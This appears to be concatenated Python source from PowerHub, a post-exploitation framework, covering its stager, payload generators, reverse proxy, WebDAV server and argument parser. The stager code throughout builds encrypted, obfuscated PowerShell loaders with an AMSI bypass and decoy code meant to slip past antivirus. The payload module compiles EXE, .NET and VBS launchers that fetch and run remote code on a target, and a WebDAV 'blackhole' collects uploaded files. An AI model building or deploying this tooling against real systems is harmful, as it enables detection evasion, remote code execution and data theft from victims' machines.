        return base64.b64encode(encrypt_rc4(msg.encode(), key)).decode()

    def rc4byteencrypt(data):
        """This is a function for encrypting bytes in jinja2 templates

        data must be hexascii encoded.
        """
        encrypted = encrypt_rc4(base64.b64encode(binascii.unhexlify(data)), key)
        return base64.b64encode(encrypted).decode()

    env.filters['rc4encrypt'] = rc4encrypt
    env.filters['rc4byteencrypt'] = rc4byteencrypt
    env.filters['debug'] = lambda msg: debug_filter(msg, dbg=debug)
    env.globals['symbol_name'] = lambda name: symbol_name(name, natural=natural, debug=debug)
    env.globals['set_alias'] = obfuscate_set_alias

    stage1_template = env.get_template(os.path.join('powershell', 'stage1.ps1'))
    antilogging = load_and_encrypt_template(env, key, 'antilogging.ps1', context)
    stage2 = load_and_encrypt_template(env, key, 'stage2.ps1', context)

    stage3 = []
    for t in stage3_files + stage3_strings:
        if t in stage3_files:
            buffer = open(t, 'r').read()
        else:
            buffer = t

        if buffer:
            if context.get('slow_encryption'):
                buffer = encrypt_rc4(buffer, key)
            else:
                buffer = encrypt_aes(buffer, key)
            stage3.append(buffer)

    context['antilogging'] = antilogging
    context['stage2'] = stage2
    context['stage3'] = stage3

    result = stage1_template.render(**context)

    if remove_whitespace and not debug:
        result = remove_leading_whitespace(result)
        result = remove_blank_lines(result)

    return result


def remove_leading_whitespace(text):
    text = re.sub(r'\s+', ' ', text)
    return text


def remove_blank_lines(text):
    result = [
        line for line in text.splitlines() if line
    ]
    result = '\n'.join(result)
    return result


def wrap_in_ps1(code, name):
    from jinja2 import Environment, FileSystemLoader

    env = Environment(loader=FileSystemLoader(
        os.path.join(directories.BASE_DIR, 'templates')
    ))
    template = env.get_template(os.path.join('powershell', 'exec_dotnet.ps1'))

    code = base64.b64encode(code).decode()
    result = template.render(code=code, name=name)
    return result


def obfuscate_file(fp_in, fp_out, natural=False, debug=False, decoy=False,
                   slow_encryption=False, epilogue='', name=None):
    import magic

    code = fp_in.read()

    try:
        code = code.decode()
        file_type = magic.from_buffer(code)
        code = sanitize_ps1(code, file_type)
    except UnicodeError:
        # It's a binary, assume .NET
        if not name:
            name = os.path.basename(fp_in.name)
            if name == '<stdin>':
                # it is a stream, not a file
                name = symbol_name('power-obfuscate', natural=natural)
                log.warning(
                    "Reading from stdin; since you did not specify a name: the code can be called with '%s'" % name
                )
        code = wrap_in_ps1(code, name)

    stage3 = [code]
    if epilogue:
        stage3.append(epilogue)

    key = generate_random_key(16)

    if decoy:
        separator = '<#%s#>' % ''.join(random.choices(string.ascii_letters, k=32))
    else:
        separator = ''

    amsi_bypass = 'reflection'
    amsi_bypass = os.path.join('powershell', 'amsi', amsi_bypass + '.ps1')
    stager_context = dict(
        kex='embedded',
        key=key,
        amsibypass=amsi_bypass,
        separator=separator,
        slow_encryption=slow_encryption,
    )

    output = get_stage(
        key,
        stage3_strings=stage3,
        context=stager_context,
        debug=debug,
        natural=natural,
        remove_whitespace=(not decoy),
    )

    if decoy:
        output = insert_decoys(output, separator)

    output = output.replace(separator, '')

    fp_out.write(output)

    outfile = fp_out.name

    if outfile == '<stdout>':
        outfile = '<ps1 script>'
    log.info("Output written to %s" % fp_out.name)
    log.info(
        "Execute the file with 'cat %(outfile)s|iex' or 'ipmo %(outfile)s' on the target"
        % dict(outfile=outfile)
    )


def obfuscate_set_alias():
    """Return an obfuscated version of the string `Set-Alias`"""

    # These chars (case sensitive) have special meanings when pre-fixed with `
    special_chars = '0abefnrtuv"\''

    cmd = random.choice(["sal", "Set-Alias"])

    # Randomize capitalization
    temp = ''
    for x in cmd.lower():
        if random.choice([True, False]):
            temp += x
        else:
            temp += x.upper()
    cmd = temp

    # Insert random quotes
    result = cmd[0]
    for i, e in enumerate(cmd[1:]):
        if random.choice([True, False]):
            result += '""'
        if random.choice([True, False]):
            result += "''"
        if random.choice([True, False]) and e not in special_chars:
            result += "`"
        result += e

    return result


def insert_decoys(code, separator):
    """Insert decoy code at positions marked by the separator

    First, split the code at the separators. Then append and prepend 1-2 legit modules
    to each segment. Finally, join the segments.
    """

    decoy_dir = os.path.join(directories.BASE_DIR, 'decoy')
    decoy_list = [f for f in os.listdir(decoy_dir)
                  if (os.path.isfile(os.path.join(decoy_dir, f)) and '.ps' in f)]

    segments = code.split(separator)

    def load_decoy_code(filename):
        full_path = os.path.join(directories.BASE_DIR, 'decoy', filename)
        return open(full_path, 'r').read()

    for i, s in enumerate(segments):
        # append
        samples = draw_samples(decoy_list, 1, 2)
        for x in samples:
            segments[i] += '\n'*random.randrange(1, 5) + load_decoy_code(x)
        # prepend
        samples = draw_samples(decoy_list, 1, 2)
        for x in samples:
            segments[i] = '\n'*random.randrange(1, 5) + load_decoy_code(x) + segments[i]

    result = ("\n\n%s\n\n" % separator).join(segments)

    # Include the LICENSE to be sure:
    license = open(os.path.join(directories.BASE_DIR, 'decoy', 'LICENSE'), 'r').read()
    result = '<#\n%s\n#>%s\n\n' % (license, result)

    return result


def draw_samples(lst, a, b):
    """Select between a und b random samples from a list and remove them"""
    k = random.randrange(a, b+1)
    result = random.sample(lst, k)
    for each in result:
        lst.remove(each)
    return result



"""
This module provides a reverse HTTP proxy. This way, we only expose two
ports: one for HTTP and one for HTTPS.

The other applications (Flask, WebDAV, possibly more in the future) are
bound to a local interface.

This way, it's much easier to handle TLS encryption.
"""
import logging
import ipaddress

from twisted.internet import reactor, ssl
from twisted.web.proxy import ReverseProxyResource
from twisted.web.server import Site
from twisted.web.resource import Resource
from twisted.python.log import PythonLoggingObserver

from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes

from powerhub.tools import get_self_signed_cert
from powerhub.directories import directories

log = logging.getLogger(__name__)


# Override DefaultOpenSSLContextFactory to call ctx.use_certificate_chain_file
# instead of ctx.use_certificate_file and to allow certificate chains to be
# loaded.
# Credit: https://github.com/twonds/punjab/blob/master/punjab/ssl.py
# MIT Licensed: Original Author: Christopher Zorn aka twonds
class OpenSSLContextFactoryChaining(ssl.DefaultOpenSSLContextFactory):
    def __init__(self, *args, **kwargs):
        ssl.DefaultOpenSSLContextFactory.__init__(self, *args, **kwargs)

    def cacheContext(self):
        ctx = self._contextFactory(self.sslmethod)
        ctx.use_certificate_chain_file(self.certificateFileName)
        ctx.use_privatekey_file(self.privateKeyFileName)
        self._context = ctx


class FilteredSite(Site):
    def __init__(self, *args, _args=None, **kwargs):
        super().__init__(*args, **kwargs)
        self.args = _args

    def buildProtocol(self, addr):
        allowlist = self.args.ALLOWLIST
        allow = True

        if allowlist and not addr.host == '127.0.0.1':
            allow = False

            for a in allowlist:
                if (
                    addr.host == a
                    or ipaddress.ip_address(addr.host) in ipaddress.ip_network(a)
                ):
                    allow = True
                    break

        if allow:
            return Site.buildProtocol(self, addr)
        else:
            log.warning("Block request from %s" % addr.host)


class DynamicProxy(Resource):
    isLeaf = False
    allowedMethods = ("GET", "POST", "PUT", "DELETE", "HEAD",
                      "PROPFIND", "OPTIONS")

    def __init__(self, *args, _args=None, **kwargs):
        super().__init__(*args, **kwargs)
        self.args = _args

    def getChild(self, path, request):
        path = path.decode()
        log.debug("%s - %s" % (request.client.host, path))
        resource = path.split('/')[0].encode()
        path = '/'.join(path.split('/')[1:])
        host = '127.0.0.1'
        x_forwarded_for = request.client.host
        x_for_host = request.requestHeaders.getRawHeaders('host')
        if x_for_host:
            x_for_host = x_for_host[0].split(':')[0]
        else:
            x_for_host = ""
        x_for_port = request.host.port
        if x_for_port == self.args.SSL_PORT:
            x_for_proto = "https"
        else:
            x_for_proto = "http"
        for header in [
            ('X-Forwarded-For', x_forwarded_for),
            ('X-Forwarded-Host', x_for_host),
            ('X-Forwarded-Port', str(x_for_port)),
            ('X-Forwarded-Proto', x_for_proto),
        ]:
            request.requestHeaders.addRawHeader(*header)
        path = path.encode()
        if resource.startswith(b"webdav"):
            new_path = b'/%s' % (resource,)
            if path:
                new_path += b'/%s' % path
            log.debug("Forwarding request to WebDAV server: %s" %
                      path.decode())
            return ReverseProxyResource(host,
                                        self.args.WEBDAV_PORT,
                                        new_path)
        else:
            log.debug("Forwarding request to Flask server")
            new_path = b'/%s' % (resource,)
            if path:
                new_path += b'/%s' % path
            return ReverseProxyResource(host, self.args.FLASK_PORT, new_path)


def run_proxy(args):
    # Shut up twisted
    observer = PythonLoggingObserver()
    observer.start()
    logging.getLogger('twisted').setLevel(logging.CRITICAL+1)

    proxy = DynamicProxy(_args=args)
    site = FilteredSite(proxy, _args=args)
    reactor.listenTCP(args.LPORT, site, interface=args.LHOST)

    if not args.SSL_KEY or not args.SSL_CERT:
        cert_dir = directories.CERT_DIR
        args.SSL_CERT, args.SSL_KEY = \
            get_self_signed_cert(args.URI_HOST, cert_dir)

    pem_data = open(args.SSL_CERT, "br").read()
    cert = x509.load_pem_x509_certificate(pem_data, default_backend())

    global FINGERPRINT
    FINGERPRINT = cert.fingerprint(hashes.SHA1()).hex()

    reactor.listenSSL(
        args.SSL_PORT,
        site,
        OpenSSLContextFactoryChaining(
            args.SSL_KEY.encode(),
            args.SSL_CERT.encode(),
        ),
        interface=args.LHOST,
    )

    log.info("Web interface accessible on http://%s:%d and https://%s:%d" % (
        args.URI_HOST,
        args.LPORT,
        args.URI_HOST,
        args.SSL_PORT,
    ))

    reactor.run()



import logging
import os
import threading
import time

from cheroot import wsgi
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
from wsgidav.wsgidav_app import WsgiDAVApp

from powerhub.directories import directories

logger = logging.getLogger("wsgidav")
main_logger = logging.getLogger(__name__)
logger.propagate = True
logger.setLevel(main_logger.getEffectiveLevel())


def init_server(port, user, password):
    config = {
        "host": '127.0.0.1',
        "port": port,
        "dir_browser": {"enable": True},
        "http_authenticator": {
            # None: dc.simple_dc.SimpleDomainController(user_mapping)
            "domain_controller": None,
            "accept_basic": True,  # Allow basic authentication, True or False
            "accept_digest": True,  # Allow digest authentication, True or False
            "default_to_digest": True,  # True  or False
            # Name of a header field that will be accepted as authorized user
            "trusted_auth_header": None,
        },
        #: Used by SimpleDomainController only
        "simple_dc": {
            "user_mapping": {
                "/webdav_ro": True,
                "/webdav": True,
                "*": {
                    user: {
                        "password": password,
                        "roles": ["admin"]
                    },
                },
            },
        },
        "provider_mapping": {
            "/webdav_ro": {
                "root": directories.WEBDAV_RO,
                "readonly": True,
                "auth": "anonymous",
            },
            "/webdav": {
                "root": directories.WEBDAV_DIR,
                "readonly": False,
                "auth": "anonymous",
            },
            "/webdav_private": {
                "root": directories.WEBDAV_PRIVATE,
                "readonly": False,
            },
        },
        "verbose": 1,
        }

    app = WsgiDAVApp(config)

    server_args = {
        "bind_addr": (config["host"], config["port"]),
        "wsgi_app": app,
        }
    server = wsgi.Server(**server_args)

    return server


class MyHandler(FileSystemEventHandler):
    """Responsible for copying files from the BLACKHOLE_DIR to the
    UPLOAD_DIR"""
    def on_created(self, event):
        os.rename(
            os.path.join(event.src_path),
            os.path.join(directories.UPLOAD_DIR, os.path.basename(event.src_path)),
        )


def watch_blackhole_folder():
    observer = Observer()
    observer.schedule(MyHandler(), path=directories.WEBDAV_BLACKHOLE, recursive=False)
    observer.start()

    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()


def run_webdav(port, user, passwod):
    threading.Thread(
        target=watch_blackhole_folder,
        daemon=True,
    ).start()
    server = init_server(port, user, passwod)
    try:
        server.start()
    except KeyboardInterrupt:
        print("Caught Ctrl-C, shutting down...")
    finally:
        server.stop()



#!/usr/bin/env python3
# -*- coding: utf-8 -*-


def main(background=False):
    from powerhub.args import parse_args
    args = parse_args()

    from powerhub.logging import init_logging
    init_logging(args.DEBUG)

    from powerhub.app import PowerHubApp
    PowerHubApp(args).run(background=background)


def power_obfuscate():
    from powerhub.po_args import parse_args
    args = parse_args()

    from powerhub.logging import init_logging
    import sys
    init_logging(args.debug, stream=sys.stderr)

    from powerhub.directories import init_directories
    init_directories(None, create_missing=False)

    from powerhub.stager import obfuscate_file
    obfuscate_file(
        args.input, args.output, epilogue=args.epilogue,
        slow_encryption=args.slow_encryption, decoy=args.decoy,
        debug=args.debug, natural=args.natural, name=args.name,
    )



import logging
import subprocess
import tempfile
import os

import jinja2

from powerhub.tools import encrypt_rc4, generate_random_key
from powerhub.stager import build_cradle, symbol_name
from powerhub.directories import directories

log = logging.getLogger(__name__)


def load_template(filename, **kwparameters):
    """Wrapper for loading a jinja2 template from file"""
    templateLoader = jinja2.FileSystemLoader(
        searchpath=os.path.join(directories.BASE_DIR, "templates", "payloads")
    )
    templateEnv = jinja2.Environment(loader=templateLoader)
    TEMPLATE_FILE = filename
    template = templateEnv.get_template(TEMPLATE_FILE)
    outputText = template.render(**kwparameters)
    return outputText


def create_filename(parameters):
    result = 'powerhub'
    result += '-' + parameters['launcher']
    result += '-' + parameters['amsi']
    result += '-' + parameters['transport']
    if str(parameters['clip-exec']) != '-1':
        result += '-' + parameters['clip-exec']
    if parameters['launcher'] in [
        'mingw32',
        'dotnetexe',
    ]:
        result += '-' + parameters['arch']
        result += '.exe'
    elif parameters['launcher'] == 'vbs':
        result += ".vbs"
    return result


def create_payload(parameters, key, callback_url):
    payload_generators = {
        "mingw32": create_exe,
        "dotnetexe": create_dotnet,
        "vbs": create_vbs,
        #  "wordmacro": create_docx,
        #  "rundll32": create_exe,
        #  "installutil": create_exe,
    }
    return payload_generators[parameters['launcher']](parameters, key, callback_url)


def create_vbs(parameters, key, callback_url):
    filename = create_filename(parameters)
    parameters.get_by_label('launcher').value = 'cmd_enc'
    cmd = build_cradle(parameters, key, callback_url).replace('\n', '')
    cmd = ('CreateObject("WScript.Shell").' +
           'exec("%s")') % cmd
    key = generate_random_key(16)
    cmd = encrypt_rc4(cmd.encode(), key)
    vbs_code = load_template(
        'powerhub.vbs',
        HEX_CODE=' '.join('%02X' % c for c in cmd),
        HEX_KEY=' '.join('%02X' % ord(c) for c in key),
        symbol_name=symbol_name,
    )
    return filename, vbs_code


def create_docx(parameters, key, callback_url):
    _, vbs_code = create_vbs(parameters, key, callback_url)
    # randomize creator in docProps/core.xml


def compile_source(parameters, key, callback_url, source_file, compile_cmd, formatter):
    filename = create_filename(parameters)
    parameters.get_by_label('launcher').value = 'cmd_enc'
    cmd = build_cradle(parameters, key, callback_url)
    size = len(cmd)
    key = generate_random_key(16)
    cmd = encrypt_rc4(cmd.encode(), key)
    c_code = load_template(
        source_file,
        CMD=formatter(cmd),
        LEN_CMD=size,
        KEY=key,
    )

    with tempfile.TemporaryDirectory() as tmpdirname:
        outfile = os.path.join(tmpdirname, 'powerhub.out')
        infile = os.path.join(tmpdirname, 'powerhub.in')
        with open(infile, 'w') as f:
            f.write(c_code)
        pipe = subprocess.Popen(
            compile_cmd(outfile) + [infile],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
        )
        out = pipe.communicate()
        if pipe.returncode == 0:
            with open(outfile, 'rb') as f:
                result = f.read()
        else:
            raise RuntimeError('Compiling the payload failed, '
                               'see console output')
            log.error('Compiling the payload failed: ' + out)

    return filename, result


def create_exe(parameters, key, callback_url):
    if parameters['arch'] == '32bit':
        mingw = 'i686-w64-mingw32-gcc'
    else:
        mingw = 'x86_64-w64-mingw32-gcc'

    return compile_source(
        parameters,
        key,
        callback_url,
        'powerhub.c',
        lambda outfile: [mingw, "-Wall", "-x", "c", "-o", outfile],
        lambda cmd: ''.join('\\x%02x' % c for c in cmd),
    )


def create_dotnet(parameters, key, callback_url):
    if parameters['arch'] == '32bit':
        platform = "x86"
    else:
        platform = "x64"

    return compile_source(
        parameters,
        key,
        callback_url,
        'powerhub.cs',
        lambda outfile: ["mcs", "-warnaserror",
                         "-platform:" + platform, "-out:" + outfile],
        lambda cmd: ','.join('0x%02x' % c for c in cmd),
    )



import logging
import os
import threading

import magic
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler

from powerhub.directories import directories


log = logging.getLogger(__name__)

modules = []
EXTENSIONS = [".ps1", ".ps1m", ".exe", ".bin"]


def get_module_type(filename, file_type, mime):
    """Determine module type based on file name, type and mime type"""

    if '.Net assembly' in file_type and filename.endswith('.exe'):
        return 'dotnet'
    elif file_type.startswith('PE32') and filename.endswith('.exe'):
        return 'pe'
    elif filename.endswith('.ps1'):
        return 'ps1'
    elif file_type == 'data':
        return 'shellcode'
    return None


def sanitize_ps1(buffer, file_type):
    """Remove BOM and make sure it's UTF-8"""

    if 'UTF-8 (with BOM)' in file_type:
        return buffer.decode('utf-8-sig').encode()
    elif 'UTF-16 (with BOM)' in file_type:
        return buffer.decode('utf-16').encode()
    elif 'UTF-16, little-endian' in file_type:
        return buffer.decode('utf-16').encode()
    elif 'UTF-16, big-endian' in file_type:
        return buffer.decode('utf-16').encode()
    elif 'ASCII text' in file_type:
        return buffer
    return buffer


def update_modules():
    """Import all modules as a list and assign global var `modules` to it"""

    result = []
    log.info("Importing modules...")

    for dirName, subdirList, fileList in os.walk(directories.MOD_DIR, followlinks=True):
        for fname in fileList:
            if fname.endswith('.tests.ps1'):
                # This is done because PowerSploit contains tests that we
                # don't want
                continue
            _, ext = os.path.splitext(fname)
            if ext.lower() not in EXTENSIONS:
                continue
            path = os.path.join(dirName, fname)
            module = import_file(path)
            if module:
                result.append(module)

    enumerate_modules(_modules=result)

    global modules
    modules = result


def import_file(path):
    with open(path, "br") as f:
        buffer = f.read(2048)
        file_type = magic.from_buffer(buffer)
        mime = magic.from_buffer(buffer, mime=True)
        fname = os.path.basename(path)
        mod_type = get_module_type(fname, file_type, mime)
        if not mod_type:
            return
    module = Module(
        path.replace(directories.MOD_DIR, ''),
        path,
        mod_type,
        file_type,
    )
    log.debug("Imported module (%s): %s" % (path, mod_type))
    return module


def enumerate_modules(_modules=modules):
    for i, m in enumerate(_modules):
        m.n = i


class Module(object):
    """Represents a module
    """

    def __init__(self, name, path, type, file_type):
        self.name = name
        self._path = path
        self.type = type
        self.file_type = file_type
        self.n = -1
        self._code = None

    @property
    def code(self):
        if self._code is None:
            self._code = open(self._path, 'rb').read()
            if self.type == 'ps1':
                self._code = sanitize_ps1(self._code, self.file_type)

        return self._code

    def as_dict(self):
        return {
            "Name": self.name,
            "BaseName": os.path.basename(self.name),
            "N": self.n,
            "Type": self.type,
            "Loaded": "$False",
            "Alias": "$Null",
        }


def find_module_by_path(path):
    for m in modules:
        if m._path == path:
            return m


def on_created(event):
    module = import_file(event.src_path)
    if not module:
        return
    modules.append(module)
    module.n = len(modules) - 1
    log.info("Module added (%d): %s" % (module.n, module.name))


def on_deleted(event):
    m = find_module_by_path(event.src_path)
    if not m:
        return
    log.info("Module deleted: %s" % m.name)
    modules.remove(m)
    enumerate_modules()


def on_modified(event):
    module = import_file(event.src_path)
    m = find_module_by_path(event.src_path)
    if not m or not module:
        return
    log.info("Module modified: %s" % module.name)
    module.n = m.n
    modules[m.n] = module


def on_moved(event):
    m = find_module_by_path(event.src_path)
    log.info("Module renamed: %s" % m.name)
    m._path = event.dest_path
    m.name = m._path.replace(directories.MOD_DIR, '')


def set_up_watchdog():
    """Watch for changed files and updated the modules"""

    patterns = ['*' + e for e in EXTENSIONS]
    ignore_patterns = None
    ignore_directories = False
    case_sensitive = False
    my_event_handler = PatternMatchingEventHandler(
        patterns, ignore_patterns, ignore_directories, case_sensitive
    )

    my_event_handler.on_created = on_created
    my_event_handler.on_deleted = on_deleted
    my_event_handler.on_modified = on_modified
    my_event_handler.on_moved = on_moved

    path = directories.MOD_DIR
    go_recursively = True
    my_observer = Observer()
    my_observer.schedule(my_event_handler, path, recursive=go_recursively)

    watchdog = threading.Thread(target=my_observer.start, daemon=True)
    watchdog.start()



import base64
import datetime
import gzip
import io
import itertools
import logging
import os
import random
import string

from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization, hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

from powerhub.sql import get_setting, set_setting

log = logging.getLogger(__name__)


def create_self_signed_cert(hostname, cert_file, key_file):
    key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
        backend=default_backend()
    )
    subject = x509.Name([
        x509.NameAttribute(x509.NameOID.ORGANIZATION_NAME, "PowerHub"),
        x509.NameAttribute(x509.NameOID.COMMON_NAME, hostname)
    ])
    hash_algo = hashes.SHA256()
    cert = x509.CertificateBuilder().subject_name(
        subject
    ).issuer_name(
        subject
    ).public_key(
        key.public_key()
    ).serial_number(
        x509.random_serial_number()
    ).add_extension(
        x509.BasicConstraints(ca=True, path_length=None), critical=True
    ).not_valid_before(
        datetime.datetime.utcnow()
    ).not_valid_after(
        datetime.datetime.utcnow() + datetime.timedelta(days=30)
    ).sign(key, hash_algo, default_backend())

    log.info("Generated a self-signed certifiate for '%s' with SHA-1 "
             "fingerprint: %s" % (hostname, cert.fingerprint(hash_algo).hex()))

    with open(cert_file, "wb") as f:
        f.write(cert.public_bytes(serialization.Encoding.PEM))
    with open(key_file, "wb") as f:
        f.write(key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.TraditionalOpenSSL,
            encryption_algorithm=serialization.NoEncryption()
        ))


def get_self_signed_cert(hostname, cert_dir):
    file_basename = os.path.join(cert_dir, "cert_%s." % hostname)
    cert_file = file_basename + 'cert'
    key_file = file_basename + 'key'

    # check if one already exists
    if not (os.path.isfile(cert_file) and
            os.path.isfile(key_file)):

        log.info("No SSL certificate found, generating a self-signed one...")
        create_self_signed_cert(hostname, cert_file, key_file)

    pem_data = open(cert_file, "br").read()
    cert = x509.load_pem_x509_certificate(pem_data, default_backend())

    if cert.not_valid_after < datetime.datetime.now():
        log.info("Certificate expired, generating a new one...")
        create_self_signed_cert(hostname, cert_file, key_file)
        pem_data = open(cert_file, "br").read()
        cert = x509.load_pem_x509_certificate(pem_data, default_backend())

    hash_algo = hashes.SHA256()
    log.info("Loaded SSL certificate for '%s' with SHA1 fingerprint: %s"
             % (hostname, cert.fingerprint(hash_algo).hex()))
    return (cert_file, key_file)


def generate_random_key(n):
    key = ''.join(
        random.choice(string.ascii_letters+string.digits)
        for _ in range(n)
    )
    log.debug("Generated a secret key: %s", key)
    return key


def get_secret_key():
    KEY_LENGTH = 32
    key = get_setting("secret_key")

    if not key:
        key = generate_random_key(KEY_LENGTH)
        set_setting("secret_key", key)
    else:
        log.debug("Loaded secret key: %s", key)

    return key


def compress(bytes):
    out = io.BytesIO()
    with gzip.GzipFile(fileobj=out, mode="w") as f:
        f.write(bytes)
    return out.getvalue()


def encrypt_rc4(data, key):
    """RC4"""

    if isinstance(key, str):
        key = key.encode()
    if isinstance(data, str):
        data = data.encode()
        string = True
    else:
        string = False

    S = list(range(256))
    j = 0
    out = []

    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    i = j = 0
    for char in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(char ^ S[(S[i] + S[j]) % 256])

    result = (bytes(out))

    if string:
        result = base64.b64encode(result).decode()

    return result


def encrypt_aes(data, key):
    """Encrypt AES128 with IV"""

    if isinstance(data, str):
        data = data.encode()
        string = True
    else:
        string = False

    # Use PKCS7 padding
    def pad(m):
        return m+bytes([16-len(m) % 16]*(16-len(m) % 16))

    BLOCK_SIZE = 16
    iv = os.urandom(BLOCK_SIZE)
    key = key[:BLOCK_SIZE].encode()

    cipher = Cipher(algorithms.AES(key),
                    modes.CBC(iv),
                    backend=default_backend())
    encryptor = cipher.encryptor()
    data = pad(data)
    result = encryptor.update(data) + encryptor.finalize()

    result = iv + result

    if string:
        result = base64.b64encode(result).decode()

    return result


def decrypt_aes(data, key):
    """Decrypt AES128 with IV"""

    # Use PKCS7 padding
    def unpad(s):
        return s[:-ord(s[len(s)-1:])]

    BLOCK_SIZE = 16
    iv = data[:BLOCK_SIZE]
    key = key[:BLOCK_SIZE].encode()

    cipher = Cipher(algorithms.AES(key),
                    modes.CBC(iv),
                    backend=default_backend())
    decryptor = cipher.decryptor()
    result = decryptor.update(data[BLOCK_SIZE:]) + decryptor.finalize()

    return unpad(result)


def unique(a):
    result = []
    for each in a:
        if each not in result:
            result.append(each)
    return result


def flatten(lst):
    flatten = itertools.chain.from_iterable
    return list(flatten(lst))


class Memoize:
    def __init__(self, f):
        self.f = f
        self.memo = {}

    def __call__(self, *args):
        if args not in self.memo:
            self.memo[args] = self.f(*args)
        return self.memo[args]



import os
from datetime import datetime
from operator import itemgetter

from powerhub.directories import directories
from powerhub.tools import decrypt_aes


def save_file(file, dir=directories.UPLOAD_DIR, key=None):
    """Save a file to the upload directory and return the filename

    If it already exists, append a counter.
    """
    filename = os.path.join(dir, os.path.basename(file.filename))
    if os.path.exists(filename):
        count = 1
        while os.path.isfile("%s.%d" % (filename, count)):
            count += 1
        filename += ".%d" % count
    if key:
        data = file.read()
        data = decrypt_aes(data, key)
        with open(filename, 'bw') as f:
            f.write(data)
    else:
        file.save(filename)
    return filename


def get_filelist():
    """Return a list of files in the upload directory"""
    onlyfiles = [f for f in os.listdir(directories.UPLOAD_DIR)
                 if os.path.isfile(os.path.join(directories.UPLOAD_DIR, f))]
    result = [{
                "name": f,
                "size": os.path.getsize(os.path.join(directories.UPLOAD_DIR, f)),
                "date": datetime.fromtimestamp(os.path.getmtime(
                            os.path.join(directories.UPLOAD_DIR, f)
                            )).strftime('%Y-%m-%d %H:%M:%S'),
            } for f in onlyfiles]
    result = sorted(result, key=itemgetter('name'))
    return result



import hashlib
import logging
import random
import string

from cryptography.hazmat.primitives.asymmetric import dh

from powerhub.tools import encrypt_rc4

DH_ENDPOINT = ''.join(random.choices(string.ascii_letters, k=16))
DH_MODULUS = None
DH_G = None
KEY_SIZE = 512

log = logging.getLogger(__name__)


def generate_diffie_hellman_params():
    log.info("Generating new Diffie-Hellman parameters")
    g = 2
    parameters = dh.generate_parameters(generator=g, key_size=KEY_SIZE)
    p = parameters.parameter_numbers()._p

    global DH_MODULUS, DH_G
    DH_MODULUS, DH_G = p, g


def dh_kex(client_public, key):
    """Diffie-Hellman key exchange

    Input the public DH key from the client and the symmetric key

    Return the publich DH key from the server and the symmetric key
    encrypted with the shared secret
    """

    # Only server knows this
    server_secret = random.randint(2**126, 2**128)

    # y_secret will be chosen from the powerhub client

    # Server's public key
    server_public = pow(DH_G, server_secret, mod=DH_MODULUS)

    shared_secret = pow(client_public, server_secret, mod=DH_MODULUS)
    log.debug("Diffie-Hellman shared secret: %s" % shared_secret)
    shared_secret = shared_secret.to_bytes(KEY_SIZE, byteorder='little')[:64]

    encrypted_key = encrypt_rc4(key, shared_secret)

    log.debug("Diffie-Hellman shared secret (bytes): %s" % shared_secret)
    log.debug("Diffie-Hellman server secret: %s" % server_secret)
    log.debug("Diffie-Hellman server public: %s" % server_public)
    log.debug("Diffie-Hellman client public: %s" % client_public)
    log.debug("Diffie-Hellman modulus: %s" % DH_MODULUS)
    log.debug("Diffie-Hellman encrypted key: %s" % encrypted_key)

    return str(server_public), encrypted_key


def stretch(key, salt, mod=2**32):
    """Return a large, "pseudo-random" number derived from the key"""

    data = (key + salt).encode()

    m = hashlib.sha256()
    m.update(data)
    result = int.from_bytes(m.digest(), byteorder='big', signed=False)

    return result


generate_diffie_hellman_params()



import argparse
from powerhub import __version__

parser = argparse.ArgumentParser(
    description="Leverage PowerShell to load sketchy code over HTTP"
)

parser.add_argument(
    '-v', '--version', action='version', version=__version__
)

parser.add_argument(
    '-d', '--debug', dest="DEBUG", default=False, action="store_true",
    help=("enable debug mode"),
)

parser.add_argument(
    '-w', '--workspace-directory', dest="WORKSPACE_DIR", default=None,
    help="use this directory to store project-related files"
         " (default: $XDG_DATA_HOME/powerhub/workspace)"
)

auth_group = parser.add_mutually_exclusive_group()

auth_group.add_argument(
    '--auth', dest="AUTH", type=str,
    default="",
    help="define credentials for basic authentication in the form of"
         " 'user:pass' (default: powerhub:<random>)"
)

auth_group.add_argument(
    '--no-auth', dest="NOAUTH", default=False, action="store_true",
    help=("disable basic authentication (not recommended)")
)

parser.add_argument(
    '-lh', '--lhost', default='0.0.0.0',
    dest="LHOST",
    type=str,
    help="the local bind address to listen on for the HTTP and HTTPS "
         "services (default: %(default)s)"
)

parser.add_argument(
    '-lp',
    '--lport',
    default=8080,
    dest="LPORT",
    type=int,
    help="the local HTTP port to listen on (default: %(default)s)"
)

parser.add_argument(
    '-sp',
    '--ssl-port',
    default=8443,
    dest="SSL_PORT",
    type=int,
    help="the local HTTPS port to listen on (default: %(default)s)"
)

parser.add_argument(
    '-fp',
    '--flask-port',
    default=5000,
    dest="FLASK_PORT",
    type=int,
    help="the local port to listen on for the Flask app (default: %(default)s)"
)

parser.add_argument(
    '-wp',
    '--webdav-port',
    default=5001,
    dest="WEBDAV_PORT",
    type=int,
    help="the local port to listen on for the webdav server "
         "(default: %(default)s)"
)

parser.add_argument(
    '-wa',
    '--webdav-auth',
    default="",
    dest="WEBDAV_AUTH",
    type=str,
    help="define credentials for the private webdav share in the form of"
         " 'user:pass' (default: powerhub:<random>)"
)


parser.add_argument(
    '-k',
    '--key-file',
    dest="SSL_KEY",
    default=None,
    help="path to a file containing an RSA key in PEM format"
)

parser.add_argument(
    '-c',
    '--cert-file',
    dest="SSL_CERT",
    default=None,
    help="path to a file containing an X.509 certificate in PEM format"
)

parser.add_argument(
    '-a', '--allow',
    dest='ALLOWLIST',
    default=None,
    help="comma separated value of allowed source IP addresses or address "
         " ranges (leave empty to allow all)"
)

parser.add_argument(
    dest="URI_HOST", type=str,
    help="the hostname or IP address where the target can reach the server"
)

parser.add_argument(
    '-up', '--uri-port', dest="URI_PORT", type=int,
    default=0,
    help="the port where the target can reach the server"
         " (default: LPORT/SSL_PORT)"
